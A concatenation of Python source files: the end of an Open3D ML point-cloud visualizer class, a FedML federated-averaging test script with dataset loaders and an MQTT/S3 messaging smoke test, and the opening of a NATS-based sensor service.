    refresh the colormap editor if a colormap shader is active."""
    attr_name = self._datasource_combobox.selected_text
    current_channel = self._colormap_channel.selected_index
    self._scalar_min, self._scalar_max = self._objects.get_attr_minmax(
        attr_name, current_channel)
    if self._shader.selected_text in self._colormaps:
        cmap = self._colormaps[self._shader.selected_text]
        self._colormap_edit.update(cmap, self._scalar_min, self._scalar_max)
def _set_shader(self, shader_name, force_update=False):
    """Select *shader_name*, sync the side panel, and recolor geometry.

    Args:
        shader_name: one of the shader display names (e.g. SOLID_NAME).
        force_update: recolor even if the shader is already selected
            (used when the combobox text already changed).
    """
    # Disable channel if we are using a vector shader. Always do this to
    # ensure that the UI is consistent.
    if shader_name == Visualizer.COLOR_NAME:
        self._colormap_channel.enabled = False
    else:
        self._colormap_channel.enabled = True
    if shader_name == self._shader.selected_text and not force_update:
        return
    self._shader.selected_text = shader_name
    # Show the settings panel that belongs to this shader.
    idx = self._shadername2panelidx[self._shader.selected_text]
    self._shader_panels.selected_index = idx
    if shader_name in self._colormaps:
        cmap = self._colormaps[shader_name]
        self._colormap_edit.update(cmap, self._scalar_min, self._scalar_max)
    self._update_geometry_colors()
def _on_layout(self, context):
    """Window layout callback: settings panel on the right (20 em wide),
    3D view filling the remaining area."""
    frame = self.window.content_rect
    em = context.theme.font_size
    panel_width = 20 * em
    panel_rect = gui.Rect(frame.get_right() - panel_width, frame.y,
                          panel_width, frame.height - frame.y)
    self._panel.frame = panel_rect
    self._3d.frame = gui.Rect(frame.x, frame.y, panel_rect.x - frame.x,
                              frame.height - frame.y)
def _on_arcball_mode(self):
    """Switch the 3D widget to arcball (rotate-camera) navigation."""
    self._3d.set_view_controls(gui.SceneWidget.ROTATE_CAMERA)
def _on_fly_mode(self):
    """Switch the 3D widget to first-person fly navigation."""
    self._3d.set_view_controls(gui.SceneWidget.FLY)
def _on_reset_camera(self):
    """Reset the camera to the default framing of the scene."""
    self.setup_camera()
def _on_dataset_selection_changed(self, item):
    """Tree-view callback: lazily load a newly selected geometry.

    Args:
        item: tree item id; ignored unless it names a geometry.
    """
    name = self._treeid2name[item]
    if not self._is_tree_name_geometry(name):
        return

    def ui_callback():
        # Runs after loading completes: refresh ranges, geometry, boxes.
        self._update_attr_range()
        self._update_geometry(check_unloaded=True)
        self._update_bounding_boxes()

    if not self._objects.is_loaded(name):
        self._load_geometry(name, ui_callback)
def _on_display_tab_changed(self, index):
    """Switch between the list view (tab 0) and animation view (tab 1).

    Entering the animation tab snapshots the checked geometries as the
    animation frame sequence; leaving it restores checkbox visibility.
    """
    if index == 1:
        self._animation_frames = self._get_selected_names()
        self._slider.set_limits(0, len(self._animation_frames) - 1)
        self._on_animation_slider_changed(self._slider.int_value)
        # _on_animation_slider_changed() calls _update_bounding_boxes()
    else:
        for name, node in self._name2treenode.items():
            self._3d.scene.show_geometry(name, node.checkbox.checked)
        self._update_bounding_boxes()
def _on_animation_slider_changed(self, new_value):
    """Show only the animation frame at *new_value* and update its label."""
    idx = int(new_value)
    # Exactly one frame visible at a time.
    for i in range(0, len(self._animation_frames)):
        self._3d.scene.show_geometry(self._animation_frames[i], (i == idx))
    self._update_bounding_boxes(animation_frame=idx)
    self._3d.force_redraw()
    self._slider_current.text = self._animation_frames[idx]
    # Widen the label to match the slider so long names are not clipped.
    r = self._slider_current.frame
    self._slider_current.frame = gui.Rect(r.x, r.y,
                                          self._slider.frame.get_right(),
                                          r.height)
def _on_start_animation(self):
    """Start playback: flip the Play button to Stop and hook the tick."""

    def on_tick():
        return self._on_animate()

    self._play.text = "Stop"
    self._play.set_on_clicked(self._on_stop_animation)
    # 0.0 guarantees the first tick advances immediately.
    self._last_animation_time = 0.0
    self.window.set_on_tick_event(on_tick)
def _on_animate(self):
    """Tick handler: advance one frame when the frame delay has elapsed.

    Returns:
        True if a redraw is needed (frame advanced), else False.
    """
    now = time.time()
    if now >= self._last_animation_time + self._animation_delay_secs:
        # Wrap around at the end for continuous looping.
        idx = (self._slider.int_value + 1) % len(self._animation_frames)
        self._slider.int_value = idx
        self._on_animation_slider_changed(idx)
        self._last_animation_time = now
        return True
    return False
def _on_stop_animation(self):
    """Stop playback: unhook the tick and restore the Play button."""
    self.window.set_on_tick_event(None)
    self._play.text = "Play"
    self._play.set_on_clicked(self._on_start_animation)
def _on_bgcolor_changed(self, new_color):
    """Apply the picked background color (RGBA) to the 3D scene."""
    bg_color = [
        new_color.red, new_color.green, new_color.blue, new_color.alpha
    ]
    self._3d.scene.set_background(bg_color)
    self._3d.force_redraw()
def _on_datasource_changed(self, attr_name, idx):
    """Attribute combobox callback: rebuild channels, pick a shader,
    and refresh the geometry.

    Args:
        attr_name: newly selected attribute name.
        idx: combobox index (unused; signature fixed by the widget).
    """
    selected_names = self._get_selected_names()
    # Channel count comes from the first selected object's attr shape.
    n_channels = 1
    if len(selected_names) > 0:
        shape = self._objects.get_attr_shape(selected_names[0], attr_name)
        if len(shape) <= 1:
            n_channels = 1
        else:
            n_channels = max(1, shape[1])
    # Keep the previous channel if it is still in range.
    current_channel = max(0, self._colormap_channel.selected_index)
    current_channel = min(n_channels - 1, current_channel)
    self._colormap_channel.clear_items()
    for i in range(0, n_channels):
        self._colormap_channel.add_item(str(i))
    self._colormap_channel.selected_index = current_channel
    self._update_attr_range()
    self._update_shaders_combobox()

    # Try to intelligently pick a shader.
    current_shader = self._shader.selected_text
    if current_shader == Visualizer.SOLID_NAME:
        pass  # explicit user choice; keep it
    elif attr_name in self._attrname2lut:
        self._set_shader(Visualizer.LABELS_NAME)
    elif attr_name == "colors":
        self._set_shader(Visualizer.COLOR_NAME)
    elif n_channels >= 3:
        self._set_shader(Visualizer.RAINBOW_NAME)
    elif current_shader == Visualizer.COLOR_NAME:  # vector -> scalar
        self._set_shader(Visualizer.RAINBOW_NAME)
    else:  # changing from one scalar to another, don't change
        pass

    self._update_geometry()
def _on_channel_changed(self, name, idx):
    """Channel combobox callback: new channel means new scalar range."""
    self._update_attr_range()
    self._update_geometry()  # need to recompute scalars array
def _on_shader_changed(self, name, idx):
    """Shader combobox callback."""
    # _shader.current_text is already name, so we need to force an update
    self._set_shader(name, force_update=True)
def _on_shader_color_changed(self, color):
    """Solid-color picker callback: recolor with the new material."""
    self._update_geometry_colors()
def _on_labels_changed(self):
    """Label-LUT editor callback: recolor with the updated labels."""
    self._update_geometry_colors()
def _on_colormap_changed(self):
    """Colormap editor callback: store the edited map and recolor."""
    self._colormaps[
        self._shader.selected_text] = self._colormap_edit.colormap
    self._update_geometry_colors()
def _on_rgb_multiplier(self, text, idx):
    """RGB max-value combobox callback: rescale colors via full refresh."""
    self._update_geometry()
def _get_selected_names(self):
# Note that things like bounding boxes could be in the tree, and we
# do not want to include them in the list of things selected, even if
# they are checked.
selected_names = []
for n in self._objects.data_names:
if self._name2treenode[n].checkbox.checked:
selected_names.append(n)
return selected_names
def _get_available_attrs(self):
    """Return attribute names common to the currently checked geometries."""
    selected_names = self._get_selected_names()
    return self._objects.get_available_attrs(selected_names)
def _is_tree_name_geometry(self, name):
return (name in self._objects.data_names)
@staticmethod
def _make_tcloud_array(np_array, copy=False):
    """Wrap a numpy array as an Open3D core Tensor, zero-copy if possible.

    Args:
        np_array: source numpy array.
        copy: force a copy even when the array is contiguous.
    """
    if copy or not np_array.data.c_contiguous:
        # Non-contiguous memory (or explicit request): materialize a copy.
        return o3d.core.Tensor(np_array)
    else:
        # Contiguous: share the numpy buffer without copying.
        return o3d.core.Tensor.from_numpy(np_array)
def visualize_dataset(self,
                      dataset,
                      split,
                      indices=None,
                      width=1024,
                      height=768):
    """
    Visualize a dataset.

    Example:
        Minimal example for visualizing a dataset::

            import open3d.ml.torch as ml3d  # or open3d.ml.tf as ml3d

            dataset = ml3d.datasets.SemanticKITTI(dataset_path='/path/to/SemanticKITTI/')
            vis = ml3d.vis.Visualizer()
            vis.visualize_dataset(dataset, 'all', indices=range(100))

    Args:
        dataset: The dataset to use for visualization.
        split: The dataset split to be used, such as 'training'
        indices: An iterable with a subset of the data points to visualize, such as [0,2,3,4].
        width: The width of the visualization window.
        height: The height of the visualization window.
    """
    # Setup the labels: one LUT entry per class name, keyed by the name
    # itself so dataset labels map directly to colors.
    lut = LabelLUT()
    for val in sorted(dataset.label_to_names.values()):
        lut.add_label(val, val)
    self.set_lut("labels", lut)

    # Datasets can have many per-frame boxes; draw them consolidated.
    self._consolidate_bounding_boxes = True
    self._init_dataset(dataset, split, indices)
    self._visualize("Open3D - " + dataset.name, width, height)
def visualize(self,
              data,
              lut=None,
              bounding_boxes=None,
              width=1024,
              height=768):
    """
    Visualize a custom point cloud data.

    Example:
        Minimal example for visualizing a single point cloud with an
        attribute::

            import numpy as np
            import open3d.ml.torch as ml3d
            # or import open3d.ml.tf as ml3d

            data = [ {
                'name': 'my_point_cloud',
                'points': np.random.rand(100,3).astype(np.float32),
                'point_attr1': np.random.rand(100).astype(np.float32),
                } ]

            vis = ml3d.vis.Visualizer()
            vis.visualize(data)

    Args:
        data: A list of dictionaries. Each dictionary is a point cloud with
            attributes. Each dictionary must have the entries 'name' and
            'points'. Points and point attributes can be passed as numpy
            arrays, PyTorch tensors or TensorFlow tensors.
        lut: Optional label LUT registered under the "labels" attribute.
        bounding_boxes: Optional list of boxes to draw alongside the clouds.
        width: window width.
        height: window height.
    """
    self._init_data(data)

    if lut is not None:
        self.set_lut("labels", lut)

    if bounding_boxes is not None:
        prefix = Model.bounding_box_prefix
        # Filament crashes if you have too many items, and anyway, hundreds
        # of items is unwieldy in a list. So combine items if we have too
        # many.
        group_size = int(math.floor(float(len(bounding_boxes)) / 100.0))
        if group_size < 2:
            # Few enough boxes: one tree entry per box.
            box_data = [
                Model.BoundingBoxData(prefix + str(bbox), [bbox])
                for bbox in bounding_boxes
            ]
        else:
            # Many boxes: chunk them into groups of `group_size`, naming
            # each entry by the index range it covers.
            box_data = []
            current_group = []
            n = len(bounding_boxes)
            for i in range(0, n):
                current_group.append(bounding_boxes[i])
                if len(current_group) >= group_size or i == n - 1:
                    if i < n - 1:
                        name = prefix + "Boxes " + str(
                            i + 1 - group_size) + " - " + str(i)
                    else:
                        # Final (possibly short) group.
                        if len(current_group) > 1:
                            name = prefix + "Boxes " + str(
                                i + 1 - len(current_group)) + " - " + str(i)
                        else:
                            name = prefix + "Box " + str(i)
                    data = Model.BoundingBoxData(name, current_group)
                    box_data.append(data)
                    current_group = []
        self._objects.bounding_box_data = box_data

    self._visualize("Open3D", width, height)
def _visualize(self, title, width, height):
    """Create the window, show the first object, and run the GUI loop.

    Args:
        title: window title.
        width: window width in pixels.
        height: window height in pixels.
    """
    gui.Application.instance.initialize()
    self._init_user_interface(title, width, height)

    # Large clouds get downsampled for interactive rendering.
    self._3d.scene.downsample_threshold = 400000

    # Turn all the objects off except the first one
    for name, node in self._name2treenode.items():
        node.checkbox.checked = False
        self._3d.scene.show_geometry(name, False)
    for name in [self._objects.data_names[0]]:
        self._name2treenode[name].checkbox.checked = True
        self._3d.scene.show_geometry(name, True)

    def on_done_ui():
        # Add bounding boxes here: bounding boxes belonging to the dataset
        # will not be loaded until now.
        self._update_bounding_boxes()

        self._update_datasource_combobox()
        self._update_shaders_combobox()

        # Display "colors" by default if available, "points" if not
        available_attrs = self._get_available_attrs()
        self._set_shader(self.SOLID_NAME, force_update=True)
        if "colors" in available_attrs:
            self._datasource_combobox.selected_text = "colors"
        elif "points" in available_attrs:
            self._datasource_combobox.selected_text = "points"

        # Suppress per-step geometry refreshes while syncing the UI; one
        # full _update_geometry() happens below.
        self._dont_update_geometry = True
        self._on_datasource_changed(
            self._datasource_combobox.selected_text,
            self._datasource_combobox.selected_index)
        self._update_geometry_colors()
        self._dont_update_geometry = False

        # _datasource_combobox was empty, now isn't, re-layout.
        self.window.set_needs_layout()

        self._update_geometry()
        self.setup_camera()

    self._load_geometries(self._objects.data_names, on_done_ui)
    gui.Application.instance.run()
|
fedavg_test.py | #!/usr/bin/env python3
import json
import multiprocessing
import os
import sys
# add the FedML root directory to the python path
import threading
import time
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "./../../../../")))
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "./../../../")))
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "./../../")))
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "./../")))
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "./")))
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "")))
from fedml_api.distributed.fedavg_cross_silo.FedAvgAPI import FedAvgAPI
from fedml_api.model.cv.efficientnet import EfficientNet
from fedml_api.model.cv.mobilenet_v3 import MobileNetV3
from fedml_api.model.linear.lr import LogisticRegression
from fedml_api.model.nlp.rnn import RNN_OriginalFedAvg, RNN_StackOverFlow
from fedml_api.model.cv.resnet import resnet56
from fedml_api.model.cv.mobilenet import mobilenet
from fedml_api.model.cv.resnet_gn import resnet18
from fedml_api.model.cv.cnn import CNN_DropOut
from fedml_api.data_preprocessing.cinic10.data_loader import load_partition_data_cinic10
from fedml_api.data_preprocessing.cifar100.data_loader import load_partition_data_cifar100
from fedml_api.data_preprocessing.cifar10.data_loader_cross_silo import (
load_partition_data_cifar10 as load_partition_data_cifar10_cross_silo,
)
from fedml_api.data_preprocessing.cifar10.data_loader import load_partition_data_cifar10
from fedml_api.data_preprocessing.Landmarks.data_loader import load_partition_data_landmarks
from fedml_api.data_preprocessing.ImageNet.data_loader import load_partition_data_ImageNet
from fedml_api.data_preprocessing.MNIST.data_loader import load_partition_data_mnist
from fedml_api.data_preprocessing.stackoverflow_nwp.data_loader import load_partition_data_federated_stackoverflow_nwp
from fedml_api.data_preprocessing.stackoverflow_lr.data_loader import load_partition_data_federated_stackoverflow_lr
from fedml_api.data_preprocessing.shakespeare.data_loader import load_partition_data_shakespeare
from fedml_api.data_preprocessing.fed_shakespeare.data_loader import load_partition_data_federated_shakespeare
from fedml_api.data_preprocessing.fed_cifar100.data_loader import load_partition_data_federated_cifar100
from fedml_api.data_preprocessing.FederatedEMNIST.data_loader import load_partition_data_federated_emnist
from fedml_api.distributed.utils.gpu_mapping import mapping_processes_to_gpu_device_from_yaml_file
from fedml_core.distributed.communication import mqtt_s3
from fedml_core.distributed.communication import observer
from fedml_core.distributed.communication import mqtt
from fedml_core.distributed.communication import message
import argparse
import logging
import random
import socket
import numpy as np
import psutil
import setproctitle
import torch
import wandb
from mpi4py import MPI
def FedML_init():
    """Initialize MPI and return (comm, rank, world_size) for this process."""
    comm = MPI.COMM_WORLD
    process_id = comm.Get_rank()
    worker_number = comm.Get_size()
    return comm, process_id, worker_number
def add_args(parser):
    """Register all training/runtime CLI options and parse them.

    Args:
        parser: an argparse.ArgumentParser to populate.

    Returns:
        The parsed argparse.Namespace (reads sys.argv).
    """
    # Training settings
    parser.add_argument("--model", type=str, default="mobilenet", metavar="N", help="neural network used in training")
    parser.add_argument("--dataset", type=str, default="cifar10", metavar="N", help="dataset used for training")
    parser.add_argument("--data_dir", type=str, default="./../../../data/cifar10", help="data directory")
    parser.add_argument(
        "--partition_method",
        type=str,
        default="hetero",
        metavar="N",
        help="how to partition the dataset on local workers",
    )
    parser.add_argument(
        "--partition_alpha", type=float, default=0.5, metavar="PA", help="partition alpha (default: 0.5)"
    )
    parser.add_argument(
        "--client_silo_num_in_total",
        type=int,
        default=1000,
        metavar="NN",
        help="number of workers in a distributed cluster",
    )
    parser.add_argument("--silo_num_per_round", type=int, default=4, metavar="NN", help="number of workers")
    parser.add_argument(
        "--batch_size", type=int, default=64, metavar="N", help="input batch size for training (default: 64)"
    )
    parser.add_argument("--client_optimizer", type=str, default="adam", help="SGD with momentum; adam")
    parser.add_argument("--backend", type=str, default="MPI", help="Backend for Server and Client")
    parser.add_argument("--lr", type=float, default=0.001, metavar="LR", help="learning rate (default: 0.001)")
    parser.add_argument("--wd", help="weight decay parameter;", type=float, default=0.0001)
    parser.add_argument("--epochs", type=int, default=5, metavar="EP", help="how many epochs will be trained locally")
    # (fix) typo in help text: "shoud" -> "should"
    parser.add_argument("--comm_round", type=int, default=10, help="how many round of communications we should use")
    parser.add_argument(
        "--is_mobile", type=int, default=1, help="whether the program is running on the FedML-Mobile server side"
    )
    parser.add_argument("--frequency_of_the_test", type=int, default=1, help="the frequency of the algorithms")
    parser.add_argument("--gpu_server_num", type=int, default=1, help="gpu_server_num")
    parser.add_argument("--gpu_num_per_server", type=int, default=4, help="gpu_num_per_server")
    parser.add_argument(
        "--gpu_mapping_file",
        type=str,
        help="the gpu utilization file for servers and clients. If there is no \
gpu_util_file, gpu will not be used.",
    )
    parser.add_argument(
        "--gpu_mapping_key", type=str, default="mapping_default", help="the key in gpu utilization file"
    )
    parser.add_argument(
        "--grpc_ipconfig_path",
        type=str,
        default="grpc_ipconfig.csv",
        help="config table containing ipv4 address of grpc server",
    )
    parser.add_argument(
        "--trpc_master_config_path",
        type=str,
        default="trpc_master_config.csv",
        help="config indicating ip address and port of the master (rank 0) node",
    )
    parser.add_argument(
        "--enable_cuda_rpc",
        default=False,
        action="store_true",
        help="Enable cuda rpc (only for TRPC backend)",
    )
    parser.add_argument("--silo_node_rank", type=int, default=0, help="rank of the node in silo")
    parser.add_argument("--silo_rank", type=int, default=0, help="rank of the silo")
    # parser.add_argument(
    #     "--local_rank", type=int, default=1, help="local rank in the node, Passed by launcher.py"
    # )
    parser.add_argument("--nnode", type=int, default=1, help="number of nodes in silo")
    parser.add_argument("--nproc_per_node", type=int, default=1, help="number of processes in each node")
    parser.add_argument("--pg_master_address", type=str, default=1, help="address of the DDP process group master")
    parser.add_argument("--pg_master_port", type=int, default=1, help="port of the DDP process group master")
    parser.add_argument(
        "--silo_gpu_mapping_file",
        type=str,
        help="the gpu utilization file for silo processes.",
    )
    # MQTT
    parser.add_argument(
        "--mqtt_config_path",
        type=str,
        help="Path of config for mqtt server.",
    )
    # --------------------------
    # S3
    parser.add_argument(
        "--s3_config_path",
        type=str,
        help="Path of config for S3 server.",
    )
    # --------------------------
    parser.add_argument(
        "--run_id",
        type=str,
        help="Run id for one federated training workflow.",
    )
    parser.add_argument(
        "--client_ids",
        type=str,
        help="Client id list in the same federated training run.",
    )
    parser.add_argument("--ci", type=int, default=0, help="CI")
    args = parser.parse_args()
    return args
def load_data(args, dataset_name):
    """Load and partition *dataset_name*, returning the standard 8-field list.

    Returns:
        [train_data_num, test_data_num, train_data_global, test_data_global,
         train_data_local_num_dict, train_data_local_dict,
         test_data_local_dict, class_num]

    Side effects:
        For federated datasets, sets args.data_silo_num_in_total to the
        silo count reported by the loader (or a fixed count for gld*);
        for gld*, also rewrites args.data_dir to its "images" subdir.
    """
    logging.info("load_data. dataset_name = %s" % dataset_name)

    # (refactor) the original had seven copy-pasted branches that each
    # unpacked the same 9-tuple; collapsed into two dispatch tables keyed
    # by the loader's call signature.
    # Loaders called as loader(batch_size) -> (silo_num, *8 fields).
    loaders_by_batch = {
        "mnist": load_partition_data_mnist,
        "shakespeare": load_partition_data_shakespeare,
    }
    # Loaders called as loader(dataset, data_dir) -> (silo_num, *8 fields).
    loaders_by_dir = {
        "femnist": load_partition_data_federated_emnist,
        "fed_shakespeare": load_partition_data_federated_shakespeare,
        "fed_cifar100": load_partition_data_federated_cifar100,
        "stackoverflow_lr": load_partition_data_federated_stackoverflow_lr,
        "stackoverflow_nwp": load_partition_data_federated_stackoverflow_nwp,
    }

    if dataset_name in loaders_by_batch:
        # For shallow NN or linear models we uniformly sample a fraction of
        # clients each round (as the original FedAvg paper).
        silo_num, *fields = loaders_by_batch[dataset_name](args.batch_size)
        args.data_silo_num_in_total = silo_num
    elif dataset_name in loaders_by_dir:
        silo_num, *fields = loaders_by_dir[dataset_name](args.dataset,
                                                         args.data_dir)
        args.data_silo_num_in_total = silo_num
    elif dataset_name == "ILSVRC2012":
        fields = list(
            load_partition_data_ImageNet(
                dataset=dataset_name,
                data_dir=args.data_dir,
                partition_method=None,
                partition_alpha=None,
                silo_number=args.data_silo_num_in_total,
                batch_size=args.batch_size,
            ))
    elif dataset_name in ("gld23k", "gld160k"):
        # Google Landmarks: fixed silo counts and CSV split files.
        if dataset_name == "gld23k":
            args.data_silo_num_in_total = 233
            train_csv, test_csv = "mini_gld_train_split.csv", "mini_gld_test.csv"
        else:
            args.data_silo_num_in_total = 1262
            train_csv, test_csv = "federated_train.csv", "test.csv"
        fed_train_map_file = os.path.join(args.data_dir, train_csv)
        fed_test_map_file = os.path.join(args.data_dir, test_csv)
        args.data_dir = os.path.join(args.data_dir, "images")
        fields = list(
            load_partition_data_landmarks(
                dataset=dataset_name,
                data_dir=args.data_dir,
                fed_train_map_file=fed_train_map_file,
                fed_test_map_file=fed_test_map_file,
                partition_method=None,
                partition_alpha=None,
                silo_number=args.data_silo_num_in_total,
                batch_size=args.batch_size,
            ))
    else:
        if dataset_name == "cifar10":
            # TODO: find a better way for difference between clients and server
            if args.silo_rank == 0:
                logging.info("loading cifa10 for server")
                data_loader = load_partition_data_cifar10
            else:
                logging.info("loading cifa10 for client")
                data_loader = load_partition_data_cifar10_cross_silo
        elif dataset_name == "cifar100":
            data_loader = load_partition_data_cifar100
        elif dataset_name == "cinic10":
            data_loader = load_partition_data_cinic10
        else:
            data_loader = load_partition_data_cifar10
        fields = list(
            data_loader(
                args.dataset,
                args.data_dir,
                args.partition_method,
                args.partition_alpha,
                args.data_silo_num_in_total,
                args.batch_size,
                args.silo_proc_num,
            ))
    # TODO: is it requried? Why others have?
    # args.client_silo_num_in_total = silo_num
    return list(fields)
def create_model(args, model_name, output_dim):
    """Instantiate the model named *model_name* for the given dataset.

    Args:
        args: parsed CLI namespace (only args.dataset is consulted).
        model_name: model identifier, e.g. "lr", "rnn", "mobilenet".
        output_dim: number of output classes.

    Returns:
        The constructed model, or None if no (model, dataset) branch matches.
    """
    logging.info("create_model. model_name = %s, output_dim = %s" % (model_name, output_dim))
    model = None
    if model_name == "lr" and args.dataset == "mnist":
        logging.info("LogisticRegression + MNIST")
        model = LogisticRegression(28 * 28, output_dim)
    elif model_name == "rnn" and args.dataset == "shakespeare":
        logging.info("RNN + shakespeare")
        model = RNN_OriginalFedAvg()
    elif model_name == "cnn" and args.dataset == "femnist":
        logging.info("CNN + FederatedEMNIST")
        model = CNN_DropOut(False)
    elif model_name == "resnet18_gn" and args.dataset == "fed_cifar100":
        logging.info("ResNet18_GN + Federated_CIFAR100")
        model = resnet18()
    elif model_name == "rnn" and args.dataset == "fed_shakespeare":
        logging.info("RNN + fed_shakespeare")
        model = RNN_OriginalFedAvg()
    elif model_name == "lr" and args.dataset == "stackoverflow_lr":
        logging.info("lr + stackoverflow_lr")
        model = LogisticRegression(10004, output_dim)
    elif model_name == "rnn" and args.dataset == "stackoverflow_nwp":
        # (fix) log said "CNN" for this RNN branch.
        logging.info("RNN + stackoverflow_nwp")
        model = RNN_StackOverFlow()
    elif model_name == "resnet56":
        model = resnet56(class_num=output_dim)
    elif model_name == "mobilenet":
        model = mobilenet(class_num=output_dim)
    # TODO
    elif model_name == "mobilenet_v3":
        """model_mode \in {LARGE: 5.15M, SMALL: 2.94M}"""
        model = MobileNetV3(model_mode="LARGE")
    elif model_name == "efficientnet":
        model = EfficientNet()
    return model
if __name__ == "__main__":
    # quick fix for issue in MacOS environment: https://github.com/openai/spinningup/issues/16
    if sys.platform == "darwin":
        os.environ["KMP_DUPLICATE_LIB_OK"] = "True"

    # parse python script input parameters
    parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    args = add_args(parser)

    if args.enable_cuda_rpc and (not args.gpu_mapping_file):
        parser.error("Need to specify gpu_mapping for using cuda_rpc")
    if (args.backend == "MQTT" or args.backend == "MQTT_S3") and not args.mqtt_config_path:
        parser.error("Please add argument --mqtt_config_path")
    # (fix) the original re-checked mqtt_config_path here, so a missing S3
    # config could never trigger this error; check s3_config_path instead.
    if args.backend == "MQTT_S3" and not args.s3_config_path:
        parser.error("Please add argument --s3_config_path")

    comm, process_id, worker_number = FedML_init()

    # NOTE(review): argparse defines --client_silo_num_in_total, not
    # data_silo_num_in_total; unless the attribute is injected by a
    # launcher, the next line raises AttributeError -- confirm.
    args.worker_silo_num = args.data_silo_num_in_total + 1
    args.local_rank = process_id
    args.silo_proc_num = args.nnode * args.nproc_per_node
    args.silo_proc_rank = args.silo_node_rank * args.nproc_per_node + args.local_rank

    # # customize the process name
    str_process_name = "FedAvg (distributed):" + str(args.silo_rank)
    setproctitle.setproctitle(str_process_name)

    # customize the log format
    logging.basicConfig(
        level=logging.INFO,
        format=str(args.silo_rank) + " - %(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s",
        datefmt="%a, %d %b %Y %H:%M:%S",
    )
    logging.info(args)
    hostname = socket.gethostname()
    logging.info(
        "#############process ID = "
        + str(args.silo_rank)
        + ", host name = "
        + hostname
        + "########"
        + ", process ID = "
        + str(os.getpid())
        + ", process Name = "
        + str(psutil.Process(os.getpid()))
    )

    # initialize the wandb machine learning experimental tracking platform (https://www.wandb.com/).
    if args.silo_rank == 0 and args.silo_proc_rank == 0:
        print("wandb.init")

    # Set the random seed. The np.random seed determines the dataset partition.
    # The torch_manual_seed determines the initial weight.
    # We fix these two, so that we can reproduce the result.
    random.seed(0)
    np.random.seed(0)
    torch.manual_seed(0)
    torch.cuda.manual_seed_all(0)

    # Please check "GPU_MAPPING.md" to see how to define the topology
    logging.info(
        "silo_rank = %d, silo_proc_rank = %d, silo_proc_num = %d"
        % (args.silo_rank, args.silo_proc_rank, args.silo_proc_num)
    )
    device = mapping_processes_to_gpu_device_from_yaml_file(
        args.silo_rank, args.worker_silo_num, args.gpu_mapping_file, args.gpu_mapping_key, check_cross_silo=True
    )

    # load data
    dataset = load_data(args, args.dataset)
    [
        train_data_num,
        test_data_num,
        train_data_global,
        test_data_global,
        train_data_local_num_dict,
        train_data_local_dict,
        test_data_local_dict,
        class_num,
    ] = dataset

    bind_port = 10000
def fedml_test():
    """Create the model and launch distributed FedAvg training.

    Relies on module-level state prepared above: ``args``, ``device``,
    ``dataset`` and the unpacked per-silo data variables.
    """
    # create model.
    # Note if the model is DNN (e.g., ResNet), the training will be very slow.
    # In this case, please use our FedML distributed version (./fedml_experiments/distributed_fedavg)
    model = create_model(args, model_name=args.model, output_dim=dataset[7])  # dataset[7] == class_num
    # print(len(train_data_local_num_dict.items()[0][0].items()))
    # print(len(train_data_local_num_dict.items()[0][0].))
    # start distributed training; argument order is fixed by FedAvgAPI.
    # NOTE(review): the 4th positional argument is None -- presumably the comm
    # handle; confirm against FedAvgAPI's signature.
    FedAvgAPI(
        args.silo_rank,
        args.worker_silo_num,
        device,
        None,
        model,
        train_data_num,
        train_data_global,
        test_data_global,
        train_data_local_num_dict,
        train_data_local_dict,
        test_data_local_dict,
        args,
    )
def mqtt_s3_test():
    """Smoke-test the MQTT+S3 comm manager: connect, attach an observer, loop.

    Reads the module-level ``client_id`` / ``bind_port`` globals at call time;
    they are mutated between the two Process launches below.
    """
    class MqttObserver(observer.Observer):
        # Print every message delivered by the comm manager.
        def receive_message(self, msg_type, msg_params) -> None:
            print("receive_message(%s, %s)" % (msg_type, msg_params.to_string()))
    mqtt_s3_obj = mqtt_s3.MqttS3CommManager('mqtt_config.yaml', 's3_config.yaml', topic='168',
                                            client_id=client_id, client_num=1,
                                            client_real_ids=json.loads(args.client_ids),
                                            bind_port=bind_port)
    #mqtt_s3_obj = mqtt.MqttCommManager('mqtt_config.yaml', topic='fedml_168_', client_id=1, client_num=1)
    mqtt_observer = MqttObserver()
    mqtt_s3_obj.add_observer(mqtt_observer)
    # Example payload kept for manual testing; the send is commented out, so
    # by default this function only receives.
    msg_json = '{"msg_type":3,"sender":1,"receiver":0,"model_params":[{"obj1":1},{"obj2":2}]}'
    msg_obj = message.Message()
    msg_obj.init_from_json_string(msg_json)
    #mqtt_s3_obj.send_message(msg_obj)
    # Block forever, pumping the MQTT network loop.
    while True:
        mqtt_s3_obj.run_loop_forever()
        time.sleep(0.1)
#thread = threading.Thread(target=mqtt_s3_test(),args=10000)
#thread.start()
#thread2 = threading.Thread(target=mqtt_s3_test(),args=10002)
#thread2.start()
# Launch two comm-manager test clients in separate processes, with different
# client ids / bind ports.
client_id = 0
multiprocessing.Process(target=mqtt_s3_test).start()
time.sleep(3)
# NOTE(review): mutating these globals after the first Process has started
# relies on fork semantics (the child snapshots state at fork time); on
# spawn-based platforms both children may see the same values -- confirm.
bind_port = 20000
client_id += 1
multiprocessing.Process(target=mqtt_s3_test).start()
# Keep the parent alive while the children run.
while True:
    time.sleep(0.1)
|
main.py | from CommunicationLayer import NATSCommunication
from CommunicationLayer import ServiceRegistry
import asyncio
import argparse
import os
import APIGateway
import cherrypy
import threading
from Sensors import CSVSensor
class Logic:
    """Sensor service main logic: reads frames from a CSV-backed sensor and
    publishes them over NATS at a configured frame rate.

    Attribute names (including the original ``communciator`` spelling) are
    kept for compatibility with the API gateway, which reads this object
    directly.
    """
    # Class-level defaults; overwritten per instance in __init__/run().
    lastFrame = None
    coordinateN = 0
    coordinateE = 0
    Name = ""
    frameRate = 1
    args = None
    sensor = None
    communciator = None

    def __init__(self, args):
        """Cache the parsed CLI arguments and extract the typed fields.

        ``args`` is a dict; coordinates and frame rate may still be strings
        here, so they are converted explicitly.
        """
        self.args = args
        self.coordinateE = float(args["EastCoordinate"])
        self.coordinateN = float(args["NorthCoordiante"])
        self.frameRate = int(args["FramesPerSecond"])
        self.Name = args["name"]

    async def run(self, loop):
        """Stream every frame from the sensor to NATS until the source is exhausted."""
        self.sensor = self.getSensor()
        # communicator
        self.communciator = NATSCommunication.NATSCommunication()
        self.communciator.logic = self
